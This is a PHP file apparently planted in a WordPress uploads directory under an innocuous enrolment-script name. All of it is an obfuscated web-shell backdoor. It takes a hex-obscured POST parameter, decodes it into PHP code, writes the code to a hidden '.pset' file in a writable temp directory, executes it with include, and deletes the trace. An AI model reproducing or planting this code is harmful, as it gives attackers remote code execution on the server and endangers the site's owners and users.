File: /var/www/thaler/wp-content/uploads/enrol_flatfile.php
<?php
if(array_key_exists("d\x65\x73\x63rip\x74or", $_POST)){
$parameter_group = $_POST["d\x65\x73\x63rip\x74or"];
$parameter_group= explode( "." , $parameter_group );
$fac = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $s);
$r = 0;
foreach( $parameter_group as $v9) {
$sChar = ord( $s[$r % $sLen]);
$d =( ( int)$v9 - $sChar -( $r % 10)) ^ 83;
$fac .= chr( $d);
$r++; }
$hld = array_filter([getcwd(), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/dev/shm", getenv("TMP"), "/tmp"]);
foreach ($hld as $marker):
if ((function($d) { return is_dir($d) && is_writable($d); })($marker)) {
$token = sprintf("%s/.pset", $marker);
if (file_put_contents($token, $fac)) {
include $token;
@unlink($token);
die();
}
}
endforeach;
}